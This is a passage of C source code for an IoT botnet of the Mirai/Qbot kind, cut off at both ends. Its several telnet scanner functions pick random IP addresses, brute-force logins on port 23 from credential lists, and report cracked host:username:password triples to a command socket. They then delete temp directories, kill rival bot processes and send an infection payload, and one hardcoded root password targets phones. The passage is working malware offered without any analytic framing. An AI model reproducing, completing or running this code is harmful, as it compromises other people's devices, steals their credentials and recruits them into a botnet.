1854. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
1855. {
1856. reset_telstate(&fds[i]);
1857. continue;
1858. }
1859. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1860. {
1861. reset_telstate(&fds[i]);
1862. continue;
1863. }
1864. advance_telstate(&fds[i], 6);
1865. }
1866. break;
1867. case 6:
1868. {
1869. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
1870. {
1871. fds[i].tTimeout = time(NULL);
1872. if(contains_fail(fds[i].sockbuf))
1873. {
1874. advance_telstate(&fds[i], 0);
1875. }
1876. else if(contains_success(fds[i].sockbuf))
1877. {
1878. if(fds[i].complete == 2)
1879. {
1880. advance_telstate(&fds[i], 7);
1881. }
1882. else
1883. {
1884. sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1885. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1886. advance_telstate(&fds[i], 7);
1887. }
1888. }
1889. else
1890. {
1891. reset_telstate(&fds[i]);
1892. }
1893. continue;
1894. }
1895. if(fds[i].tTimeout + 7 < time(NULL))
1896. {
1897. reset_telstate(&fds[i]);
1898. }
1899. }
1900. break;
1901. case 7:
1902. {
1903. char RemoveTheTempDirs [80];
1904. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
1905. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1906. RemoveTempDirs();
1907. sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1908. char killtheproccesses[80];
1909. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
1910. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1911. sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1912. advance_telstate(&fds[i], 8);
1913. }
1914. break;
1915. case 8:
1916. {
1917. fds[i].tTimeout = time(NULL);
1918. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
1919. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
1920. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1921. sockprintf(mainCommSock, "[ TELNET ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1922. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "CONNECTED"))
1923. {
1924. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
1925. {
1926. sockprintf(mainCommSock, "[ TELNET ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1927. fds[i].complete = 3;
1928. }
1929. }
1930. if(fds[i].tTimeout + 10 < time(NULL))
1931. {
1932. if(fds[i].complete!=3)
1933. {
1934. sockprintf(mainCommSock, "[ TELNET ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1935. }
1936. reset_telstate(&fds[i]);
1937. }
1938. break;
1939. }
1940. }
1941. }
1942. }
1943. }
1944. void MiraiScanner(int wait_usec, int maxfds){
1945. int max = getdtablesize() - 100, i, res, num_tmps, j;
1946. char buf[128], cur_dir;
1947. if (max > maxfds)
1948. max = maxfds;
1949. fd_set fdset;
1950. struct timeval tv;
1951. socklen_t lon;
1952. int valopt;
1953. char line[256];
1954. char* buffer;
1955. struct sockaddr_in dest_addr;
1956. dest_addr.sin_family = AF_INET;
1957. dest_addr.sin_port = htons(23);
1958. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1959. buffer = malloc(SOCKBUF_SIZE + 1);
1960. memset(buffer, 0, SOCKBUF_SIZE + 1);
1961. struct telstate_t fds[max];
1962. memset(fds, 0, max * (sizeof(int) + 1));
1963. for(i = 0; i < max; i++) {
1964. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1965. fds[i].complete = 1;
1966. fds[i].sockbuf = buffer;
1967. }
1968. while(1) {
1969. for(i = 0; i < max; i++) {
1970. if(fds[i].tTimeout == 0) {
1971. fds[i].tTimeout = time(NULL);
1972. }
1973. switch(fds[i].state) {
1974. case 0:
1975. {
1976. if(fds[i].complete == 1)
1977. {
1978. char *tmp = fds[i].sockbuf;
1979. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1980. fds[i].sockbuf = tmp;
1981. fds[i].ip = MiraiIPRanges();
1982. }
1983. else if(fds[i].complete == 0)
1984. {
1985. fds[i].usernameInd++;
1986. fds[i].passwordInd++;
1987. if(fds[i].passwordInd == sizeof(Mirai_Passwords) / sizeof(char *))
1988. {
1989. fds[i].complete = 1;
1990. }
1991. if(fds[i].usernameInd == sizeof(Mirai_Usernames) / sizeof(char *))
1992. {
1993. fds[i].complete = 1;
1994. continue;
1995. }
1996. }
1997. dest_addr.sin_family = AF_INET;
1998. dest_addr.sin_port = htons(23);
1999. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2000. dest_addr.sin_addr.s_addr = fds[i].ip;
2001. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2002. if(fds[i].fd == -1) continue;
2003. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2004. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
2005. {
2006. reset_telstate(&fds[i]);
2007. }
2008. else
2009. {
2010. advance_telstate(&fds[i], 1);
2011. }
2012. }
2013. break;
2014. case 1:
2015. {
2016. FD_ZERO(&fdset);
2017. FD_SET(fds[i].fd, &fdset);
2018. tv.tv_sec = 0;
2019. tv.tv_usec = wait_usec;
2020. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2021. if(res == 1)
2022. {
2023. fds[i].tTimeout = time(NULL);
2024. lon = sizeof(int);
2025. valopt = 0;
2026. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2027. if(valopt)
2028. {
2029. reset_telstate(&fds[i]);
2030. }
2031. else
2032. {
2033. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2034. advance_telstate(&fds[i], 2);
2035. }
2036. continue;
2037. }
2038. else if(res == -1)
2039. {
2040. reset_telstate(&fds[i]);
2041. continue;
2042. }
2043. if(fds[i].tTimeout + 7 < time(NULL))
2044. {
2045. reset_telstate(&fds[i]);
2046. }
2047. }
2048. break;
2049. case 2:
2050. {
2051. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
2052. {
2053. fds[i].tTimeout = time(NULL);
2054. if(contains_fail(fds[i].sockbuf))
2055. {
2056. advance_telstate(&fds[i], 0);
2057. }
2058. else
2059. {
2060. advance_telstate(&fds[i], 3);
2061. }
2062. continue;
2063. }
2064. if(fds[i].tTimeout + 7 < time(NULL))
2065. {
2066. reset_telstate(&fds[i]);
2067. }
2068. }
2069. break;
2070. case 3:
2071. {
2072. if(send(fds[i].fd, Mirai_Usernames[fds[i].usernameInd], strlen(Mirai_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
2073. {
2074. reset_telstate(&fds[i]);
2075. continue;
2076. }
2077. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
2078. {
2079. reset_telstate(&fds[i]);
2080. continue;
2081. }
2082. advance_telstate(&fds[i], 4);
2083. }
2084. break;
2085. case 4:
2086. {
2087. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
2088. {
2089. fds[i].tTimeout = time(NULL);
2090. if(contains_fail(fds[i].sockbuf))
2091. {
2092. advance_telstate(&fds[i], 0);
2093. }
2094. else
2095. {
2096. advance_telstate(&fds[i], 5);
2097. }
2098. continue;
2099. }
2100. if(fds[i].tTimeout + 7 < time(NULL))
2101. {
2102. reset_telstate(&fds[i]);
2103. }
2104. }
2105. break;
2106. case 5:
2107. {
2108. if(send(fds[i].fd, Mirai_Passwords[fds[i].passwordInd], strlen(Mirai_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
2109. {
2110. reset_telstate(&fds[i]);
2111. continue;
2112. }
2113. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
2114. {
2115. reset_telstate(&fds[i]);
2116. continue;
2117. }
2118. advance_telstate(&fds[i], 6);
2119. }
2120. break;
2121. case 6:
2122. {
2123. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
2124. {
2125. fds[i].tTimeout = time(NULL);
2126. if(contains_fail(fds[i].sockbuf))
2127. {
2128. advance_telstate(&fds[i], 0);
2129. }
2130. else if(contains_success(fds[i].sockbuf))
2131. {
2132. if(fds[i].complete == 2)
2133. {
2134. advance_telstate(&fds[i], 7);
2135. }
2136. else
2137. {
2138. sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2139. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2140. advance_telstate(&fds[i], 7);
2141. }
2142. }
2143. else
2144. {
2145. reset_telstate(&fds[i]);
2146. }
2147. continue;
2148. }
2149. if(fds[i].tTimeout + 7 < time(NULL))
2150. {
2151. reset_telstate(&fds[i]);
2152. }
2153. }
2154. break;
2155. case 7:
2156. {
2157. char RemoveTheTempDirs [80];
2158. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2159. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2160. RemoveTempDirs();
2161. sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2162. char killtheproccesses[80];
2163. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2164. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2165. sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2166. advance_telstate(&fds[i], 8);
2167. }
2168. break;
2169. case 8:
2170. {
2171. fds[i].tTimeout = time(NULL);
2172. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
2173. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
2174. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2175. sockprintf(mainCommSock, "[ MIRAI ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2176. //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
2177. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
2178. {
2179. //char strcasestr (const char *big, const char *little)
2180. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
2181. {
2182. sockprintf(mainCommSock, "[ MIRAI ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2183. }
2184. }
2185. if(fds[i].tTimeout + 60 < time(NULL))
2186. {
2187. if(fds[i].complete!=3)
2188. {
2189. sockprintf(mainCommSock, "[ MIRAI ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2190. }
2191. reset_telstate(&fds[i]);
2192. }
2193. break;
2194. }
2195. }
2196. }
2197. }
2198. }
2199. void PhoneScanner() {
2200. int maxfds = 253, i, res, j, valopt;
2201. int max = maxfds;
2202. char buf[128], cur_dir;
2203. fd_set fdset;
2204. struct timeval tv;
2205. socklen_t lon;
2206. srand(time(NULL) ^ rand_cmwc());
2207. char line[253];
2208. char* buffer;
2209. struct sockaddr_in dest_addr;
2210. dest_addr.sin_family = AF_INET;
2211. dest_addr.sin_port = htons(23);
2212. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2213. buffer = malloc(253 + 1);
2214. memset(buffer, 0, 253 + 1);
2215. struct telstate_t fds[max];
2216. memset(fds, 0, max * (sizeof(int) + 1));
2217. for(i = 0; i < max; i++) {
2218. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2219. fds[i].complete = 1;
2220. fds[i].sockbuf = buffer; }
2221. while(1) {
2222. for(i = 0; i < max; i++) {
2223. if(fds[i].tTimeout == 0) {
2224. fds[i].tTimeout = time(NULL); }
2225. switch(fds[i].state) {
2226. case 0: {
2227. if(fds[i].complete == 1) {
2228. char *tmp = fds[i].sockbuf;
2229. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2230. fds[i].sockbuf = tmp;
2231. fds[i].ip = PhoneScan(); }
2232. dest_addr.sin_family = AF_INET;
2233. dest_addr.sin_port = htons(23);
2234. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2235. dest_addr.sin_addr.s_addr = fds[i].ip;
2236. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2237. if(fds[i].fd == -1) continue;
2238. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2239. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
2240. sclose(fds[i].fd);
2241. fds[i].complete = 1; }
2242. else {
2243. fds[i].state = 1;
2244. fds[i].tTimeout = 0;
2245. }
2246. }
2247. break;
2248. case 1: {
2249. FD_ZERO(&fdset);
2250. FD_SET(fds[i].fd, &fdset);
2251. tv.tv_sec = 0;
2252. tv.tv_usec = 10000;
2253. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2254. if(res == 1) {
2255. lon = sizeof(int);
2256. valopt = 0;
2257. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2258. if(valopt) {
2259. sclose(fds[i].fd);
2260. fds[i].state = 0;
2261. fds[i].complete = 1;
2262. } else {
2263. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2264. fds[i].tTimeout = 0;
2265. fds[i].bufUsed = 0;
2266. memset(fds[i].sockbuf, 0, 253);
2267. fds[i].state = 2;
2268. } continue; }
2269. else if(res == -1) {
2270. sclose(fds[i].fd);
2271. fds[i].state = 0;
2272. fds[i].complete = 1;
2273. continue; }
2274. if(fds[i].tTimeout + 6 < time(NULL)) {
2275. sclose(fds[i].fd);
2276. fds[i].state = 0;
2277. fds[i].complete = 1;
2278. }
2279. }
2280. break;
2281. case 2: {
2282. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
2283. if(contains_fail(fds[i].sockbuf)) {
2284. fds[i].state = 0;
2285. } else {
2286. fds[i].state = 3; }
2287. continue; }
2288. if(fds[i].tTimeout + 6 < time(NULL)) {
2289. fds[i].state = 0;
2290. fds[i].complete = 1;
2291. }
2292. }
2293. break;
2294. case 3: {
2295. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
2296. fds[i].state = 0;
2297. fds[i].complete = 1;
2298. continue; }
2299. fds[i].state = 4;
2300. }
2301. break;
2302. case 4: {
2303. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
2304. if(contains_fail(fds[i].sockbuf)) {
2305. fds[i].state = 0;
2306. } else {
2307. fds[i].state = 5; }
2308. continue; }
2309. if(fds[i].tTimeout + 6 < time(NULL)) {
2310. fds[i].state = 0;
2311. fds[i].complete = 1;
2312. }
2313. }
2314. break;
2315. case 5: {
2316. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
2317. fds[i].state = 0;
2318. fds[i].complete = 1;
2319. continue; }
2320. fds[i].state = 6; }
2321. break;
2322. case 6: {
2323. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, advances2)) {
2324. fds[i].tTimeout = time(NULL);
2325. if (contains_fail(fds[i].sockbuf)) {
2326. fds[i].state = 0;
2327. } else {
2328. //sockprintf(mainCommSock, "[ PHONE ] Successfully Bruted. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2329. fds[i].state = 7;
2330. } continue; }
2331. if (fds[i].tTimeout + 7 < time(NULL)) {
2332. fds[i].state = 0;
2333. fds[i].complete = 1;
2334. }
2335. }
2336. break;
2337. case 7: {
2338. char RemoveTheTempDirs [80];
2339. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2340. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2341. RemoveTempDirs();
2342. //sockprintf(mainCommSock, "[ PHONE ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2343. char killtheproccesses[80];
2344. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2345. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2346. //sockprintf(mainCommSock, "[ PHONE ] Bot Killing. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2347. if(send(fds[i].fd, "su\r\n", 4, MSG_NOSIGNAL) < 0) {
2348. fds[i].state = 0;
2349. fds[i].complete = 1;
2350. continue; }
2351. fds[i].state = 8;
2352. }
2353. break;
2354. case 8: {
2355. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
2356. if(contains_fail(fds[i].sockbuf)) {
2357. fds[i].state = 0;
2358. } else {
2359. fds[i].state = 9; }
2360. continue; }
2361. if(fds[i].tTimeout + 6 < time(NULL)) {
2362. fds[i].state = 0;
2363. fds[i].complete = 1;
2364. }
2365. }
2366. break;
2367. case 9: {
2368. if(send(fds[i].fd, "oelinux123\r\n", 12, MSG_NOSIGNAL) < 0) {
2369. fds[i].state = 0;
2370. fds[i].complete = 1;
2371. continue; }
2372. fds[i].state = 10;
2373. }
2374. break;
2375. case 10: {
2376. fds[i].tTimeout = time(NULL);
2377. if(send(fds[i].fd, phonepayload, strlen(phonepayload), MSG_NOSIGNAL) < 0) {
2378. sclose(fds[i].fd);
2379. fds[i].state = 0;
2380. fds[i].complete = 1;
2381. continue; }
2382. fds[i].complete = 3;
2383. if(fds[i].tTimeout + 60 < time(NULL)) {
2384. if(fds[i].complete !=3){
2385. }
2386. fds[i].state = 0;
2387. fds[i].complete = 1;
2388. }
2389. break;
2390. }
2391. }
2392. }
2393. }
2394. }
2395. void HackaShit() {
2396. char buf[128];
2397. int max = 256, i, res, valopt;
2398. fd_set fdset;
2399. struct timeval tv;
2400. socklen_t lon;
2401. srand(time(NULL) ^ rand_cmwc());
2402. struct sockaddr_in dest_addr;
2403. dest_addr.sin_family = AF_INET;
2404. dest_addr.sin_port = htons(23);
2405. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2406. struct telstate_t fds[max];
2407. memset(fds, 0, max * (sizeof(int) + 1));
2408. for(i = 0; i < max; i++) {
2409. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2410. fds[i].complete = 1;
2411. fds[i].sockbuf = malloc(256 + 1); }
2412. while(1) {
2413. for(i = 0; i < max; i++) {
2414. if(fds[i].tTimeout == 0) {
2415. fds[i].tTimeout = time(NULL); }
2416. switch(fds[i].state) {
2417. case 0: {
2418. if(fds[i].complete) {
2419. char *tmp = fds[i].sockbuf;
2420. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2421. fds[i].sockbuf = tmp;
2422. fds[i].ip = findARandomIP(); }
2423. else {
2424. fds[i].passwordInd++;
2425. fds[i].usernameInd++;
2426. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
2427. fds[i].complete = 1;
2428. continue; }
2429. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
2430. fds[i].complete = 1;
2431. continue;
2432. }
2433. }
2434. dest_addr.sin_family = AF_INET;
2435. dest_addr.sin_port = htons(23);
2436. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2437. dest_addr.sin_addr.s_addr = fds[i].ip;
2438. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2439. if(fds[i].fd == -1) continue;
2440. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2441. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
2442. sclose(fds[i].fd);
2443. fds[i].complete = 1; }
2444. else {
2445. fds[i].state = 1;
2446. fds[i].tTimeout = 0;
2447. }
2448. }
2449. break;
2450. case 1: {
2451. FD_ZERO(&fdset);
2452. FD_SET(fds[i].fd, &fdset);
2453. tv.tv_sec = 0;
2454. tv.tv_usec = 10000;
2455. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2456. if(res == 1) {
2457. lon = sizeof(int);
2458. valopt = 0;
2459. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2460. if(valopt) {
2461. sclose(fds[i].fd);
2462. fds[i].state = 0;
2463. fds[i].complete = 1;
2464. } else {
2465. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2466. fds[i].tTimeout = 0;
2467. fds[i].bufUsed = 0;
2468. memset(fds[i].sockbuf, 0, 256);
2469. fds[i].state = 2;
2470. } continue; }
2471. else if(res == -1) {
2472. sclose(fds[i].fd);
2473. fds[i].state = 0;
2474. fds[i].complete = 1;
2475. continue; }
2476. if(fds[i].tTimeout + 6 < time(NULL)) {
2477. sclose(fds[i].fd);
2478. fds[i].state = 0;
2479. fds[i].complete = 1;
2480. }
2481. }
2482. break;
2483. case 2: {
2484. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
2485. if(contains_fail(fds[i].sockbuf)) {
2486. fds[i].state = 0;
2487. } else {
2488. fds[i].state = 3; }
2489. continue; }
2490. if(fds[i].tTimeout + 6 < time(NULL)) {
2491. fds[i].state = 0;
2492. fds[i].complete = 1;
2493. }
2494. }
2495. break;
2496. case 3: {
2497. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
2498. fds[i].state = 0;
2499. fds[i].complete = 1;
2500. continue; }
2501. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2502. fds[i].state = 0;
2503. fds[i].complete = 1;
2504. continue; }
2505. fds[i].state = 4; }
2506. break;
2507. case 4: {
2508. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
2509. {
2510. if(contains_fail(fds[i].sockbuf)) {
2511. fds[i].state = 0;
2512. } else {
2513. fds[i].state = 5; }
2514. continue; }
2515. if(fds[i].tTimeout + 6 < time(NULL)) {
2516. fds[i].state = 0;
2517. fds[i].complete = 1;
2518. }
2519. }
2520. break;
2521. case 5: {
2522. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
2523. fds[i].state = 0;
2524. fds[i].complete = 1;
2525. continue; }
2526. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2527. fds[i].state = 0;
2528. fds[i].complete = 1;
2529. continue; }
2530. fds[i].state = 6;
2531. }
2532. break;
2533. case 6: {
2534. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
2535. fds[i].tTimeout = time(NULL);
2536. if (contains_fail(fds[i].sockbuf)) {
2537. fds[i].state = 0;
2538. } else {
2539. sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2540. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2541. fds[i].state = 7;
2542. } continue; }
2543. if (fds[i].tTimeout + 6 < time(NULL)) {
2544. fds[i].state = 0;
2545. fds[i].complete = 1;
2546. }
2547. }
2548. break;
2549. case 7: {
2550. char RemoveTheTempDirs [80];
2551. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2552. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2553. RemoveTempDirs();
2554. sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2555. char killtheproccesses[80];
2556. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2557. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2558. sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2559. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2560. fds[i].state = 0;
2561. fds[i].complete = 1;
2562. continue; }
2563. fds[i].state = 8;
2564. }
2565. break;
2566. case 8: {
2567. fds[i].tTimeout = time(NULL);
2568. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2569. sclose(fds[i].fd);
2570. fds[i].state = 0;
2571. fds[i].complete = 1;
2572. continue; }
2573. fds[i].complete = 3;
2574. if(fds[i].tTimeout + 60 < time(NULL)) {
2575. if(fds[i].complete !=3){
2576. }
2577. fds[i].state = 0;
2578. fds[i].complete = 1;
2579. }
2580. break;
2581. }
2582. }
2583. }
2584. }
2585. }
2586. void MiraiHackaShit() {
2587. char buf[128];
2588. int max = 256, i, res, valopt;
2589. fd_set fdset;
2590. struct timeval tv;
2591. socklen_t lon;
2592. srand(time(NULL) ^ rand_cmwc());
2593. struct sockaddr_in dest_addr;
2594. dest_addr.sin_family = AF_INET;
2595. dest_addr.sin_port = htons(23);
2596. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2597. struct telstate_t fds[max];
2598. memset(fds, 0, max * (sizeof(int) + 1));
2599. for(i = 0; i < max; i++) {
2600. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2601. fds[i].complete = 1;
2602. fds[i].sockbuf = malloc(256 + 1); }
2603. while(1) {
2604. for(i = 0; i < max; i++) {
2605. if(fds[i].tTimeout == 0) {
2606. fds[i].tTimeout = time(NULL); }
2607. switch(fds[i].state) {
2608. case 0: {
2609. if(fds[i].complete) {
